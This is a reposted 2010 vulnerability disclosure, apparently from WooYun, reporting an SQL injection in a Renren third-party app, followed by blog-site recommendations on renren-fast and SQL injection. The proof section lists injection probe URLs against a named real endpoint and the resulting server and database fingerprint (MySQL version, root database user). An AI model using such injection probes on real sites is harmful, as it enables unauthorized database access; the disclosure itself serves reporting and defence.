人人网第三方应用SQL注入漏洞

最新推荐文章于 2023-04-08 09:20:32 发布
最新推荐文章于 2023-04-08 09:20:32 发布
阅读量544 收藏
点赞数
文章标签: web安全 网络安全 安全 hack wooyun
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jd_cx/article/details/124174284
版权

漏洞详情

披露状态:

2010-07-24: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-23: 细节向公众公开

简要描述:

人人网第三方应用SQL注入漏洞

详细说明:

某第三方应用php过滤不严导致的SQL注入漏洞

漏洞证明:

http://apps.renren.com/todayonhistory/my.php?id=1
http://apps.renren.com/todayonhistory/my.php?id=1'
http://apps.renren.com/todayonhistory/my.php?id=1 order by 5
http://apps.renren.com/todayonhistory/my.php?id=1 order by 6
2010-7-24 20:39:55 Get Information:
Environment^^Value
Version^^5.1.25-rc
Server^^nginx/0.7.64
OS^^redhat-linux-gnu
user^^root@localhost
Database^^history
root_PasswordHash^^NULL
--------------------------

Sword-heart
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
人人商城部分bug修复
qq_37691559的博客
02-17 404
微擎人人商城订单导出EXCEL数据为空解决方案、部署多个系统后,人人商城应用列表多次重复解决办法、超级海报生成失败、商城最近在支付成功后跳转的页面出现弹层报错
人人开源renren-fast后台的BUG
how134的博客
07-23 842
前言: 最近学习springcloud alibaba,准备用尚硅谷的谷粒商城练手,项目中有用到人人开源的前后端与代码生成项目,一句话,问题多多;这里主要记录后台的BUG,前端的问题可以看我的另一个博客; 在这贴上我练手的码云地址https://gitee.com/liangguang123/lgmall.git 在这我会记录一些关于在这个商城项目中遇到的问题, 有想听课的小伙伴可以去哔哩哔哩直接学习或者COPY讲课老师的笔记、项目等(搜谷粒商城即可) 关闭开启定时任务sql报错:long不能转为list
【安全】XSS安全漏洞与CSRF攻击
藏经阁
02-08 901
XSS攻击 XSS攻击通常指的是通过利用页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到页,使用户加载并执行攻击者恶意制造的页程序。这些恶意页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密页内容、会话和cookie等各...
人人开源快速搭建后台(踩过的大坑,已解决)
wztmds的博客
04-08 1239
我试了node10,18,19都不能运行成功,最后询问了大佬,换成了node12运行成功了,node14和16据说也可以,但是没有试过。大部分同学应该是看到尚硅谷的谷粒商城来的,雷神配置好后启动后端返回的有数据,但是我们启动后返回的是404。然后删除C:\Users\86189\AppData\Roaming里面的npm和npm-cache。照着下文删除就可以了,不想用cnpm的直接走第二步。这个等你把前端部署好后,不影响前后端联调。没有验证码可能是,后端程序没有启动。用虚拟机的改成虚拟机的地址。
人人的分享页功能存在诸多安全漏洞
swordheart的博客
04-11 356
漏洞详情 简要描述: 人人的分享页功能存在诸多漏洞. 这些漏洞可导致跨站攻击,任意文件读取,代理攻击和信息泄露等各种安全隐患. 详细说明: 人人SNS社区的分享站外连接功能存在严重安全隐患, 其后台调用的Ajax接口为 http://share.renren.com/parse_share.do 向其接口提交参数link=*用于适用人人服务器读取络共享信息和视频图片信息等.但是由于底层适用类curl库,而没有正确过滤URL导致可以读取内诸多信息. 如提交 http://share.ren
SQL注入漏洞全接触.ppt
11-15
三、 SQL注入漏洞的类型 * 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入SQL Server注入、MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的...
正方教务系统新版sql注入漏洞利用工具
01-19
本人研究了/service.asmx中的其它接口,发现zfcwjk1存在同样的注入漏洞,特将注入方法写成工具供大家学习参考。 zfcwjk1似乎是一个财务类的确认接口,利用起来稍微麻烦点,需要一个目标学校的任意学号。 程序执行后...
利用SQL注入漏洞登录后台的实现方法
12-15
早在02年,国外关于SQL注入漏洞的技术文章已经很多,而国内在05年左右才开始的。 如今,谈SQL注入漏洞是否已是明日黄花,国内大大小小的站都已经补上漏洞。但,百密必有一疏,入侵是偶然的,但安全绝对不是必然的...
自己动手编写SQL注入漏洞扫描工具
12-31
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
php中sql注入漏洞示例 sql注入漏洞修复
12-18
 一、SQL注入的步骤 a) 寻找注入点(如:登录界面、留言板等) b) 用户自己构造SQL语句(如:’ or 1=1#,后面会讲解) c) 将sql语句发送给数据库管理系统(DBMS) d) DBMS接收请求,并将该请求解释成机器代码指令,...
renren-security开发文档3.2_完整版.pdf
07-31
人人权限系统是一套轻量级的权限系统,主要包括用户管理、角色管理、部门管理、菜单管 理、定时任务、参数管理、字典管理、文件上传、系统日志、APP模块等功能。其中,还拥有 多数据源、数据权限、Redis缓存动态开启与关闭、统一异常处理等技术特点。
renrenfast使用遇到的问题及解决
weixin_40932028的博客
06-04 1117
一个人人fast的使用记录贴,记录遇到的问题,持续更新
《renren-fast 人人开源 》如何暴露对API外接口?《人人开源-renrenfast 踩坑记录》
CTRA®王大大技术中心
11-10 1122
1、修改shiro的配置 配置filter的不加权限的限制路由 更多问题还可以参考:https://www.renren.io/detail/13583 2、自定义接口 注意: 只要访问时不是报错404,就是已经对外开放接口访问的权限了 3、{ msg 未知异常,请联系管理员 code :500} 前面我已经将需要处理的处理好了 外界访问报错500 可以参考这个问题:https://www.renren.io/detail/13591 这里其实是你的代码报错的问题 因为后台全部加上日志了 需要自
renren-fast-vue踩坑记录
一个有节操的码农
09-14 2万+
前言: 公司要开发新零售产品的项目,决定采用更为流弊的renren-fast(人人开源)框架,官方文档地址:https://www.renren.io/guide 个人之前也没有了解过,上文档更是少的可怜,不管是谷歌还是论坛上都找不到多少相关信息,废话不多说,先来看看我们前端的框架吧,github地址:https://github.com/daxiongYang/renren-fast-vu...
一看就懂!renren-fast 快速开发框架使用以及开发文档
热门推荐
大誌的博客
11-08 3万+
开发文档链接: https://pan.baidu.com/s/1LHT0cI1XDM6YZAiF2OX7LQ 提取码: t5mg renren-fast框架介绍 renren-fast是一个轻量级的Spring Boot快速开发平台,能快速开发项目并交付. 完善的XSS防范及脚本过滤,彻底杜绝XSS攻击 实现前后端分离,通过token进行数据交互 入门 快速开始 1....
微服务跨域问题踩坑(使用了renren-fast)
qq_54522796的博客
05-08 879
微服务CORS跨域问题,项目使用了renren-fast,踩坑避雷!
renren-fast-vue前端项目启动的坑
qq_39126213的博客
05-17 1781
后端项目renrren-fast 项目是前后端分离的架构,使用renren-generator逆向生成后端代码。后端基本配置了数据库就没什么问题了。注意generator的配置文件,包名按照自己的项目来。 前端renren-fast-vue-master 从github下载的项目,项目下载依赖的时候一直出错,给我报node-sass下载失败的错,之后查阅了很多博客,没有找到解决办法,后来在github的项目下,找到了相同问题,并解决了。 下面是解决的步骤: 卸载;node-sass已有的依赖 np
linux启动renren-fast项目遇到的问题
dieorlife的博客
07-12 632
1.tomcat启动日志中未打印启动的项目日志 就是renren项目未在tomcat中启动 解决:发现把tomcat版本换到9就可以了。太坑了这种版本问题 2.创建定时任务时报Table 'xxxx.QRTZ_TRIGGERS' doesn't exist 大小写的问题,把这些表删除,重新建,就好了 ...
人人开源renren-fast踩坑新增菜单等无反应,后台收不到请求
zhongshun0928的博客
06-07 1020
人人开源renren-fast踩坑新增菜单等无反应,后台收不到请求
第三方框架预防sql注入
最新发布
09-23
第三方框架可以采取以下措施来预防SQL注入: 1. 使用ORM(对象关系映射)框架:ORM框架可以自动将对象与数据库表进行映射,从而避免了手动编写SQL语句的过程,减少了SQL注入的风险。 2. 使用预编译语句:许多第三方框架提供了预编译语句的功能,例如JDBC的PreparedStatement。预编译语句可以将SQL语句与参数分离,从而避免了参数被当作SQL代码的一部分。 3. 输入验证和过滤:第三方框架可以提供输入验证和过滤的功能,确保用户输入符合预期的格式。例如,可以使用正则表达式验证输入是否符合特定的模式,或者使用白名单过滤器来限制输入只能包含特定字符。 4. 参数化查询:第三方框架可以通过参数化查询来执行数据库操作。参数化查询将用户输入的数据作为参数传递给SQL语句,而不是直接拼接到SQL语句中。这样可以有效地防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值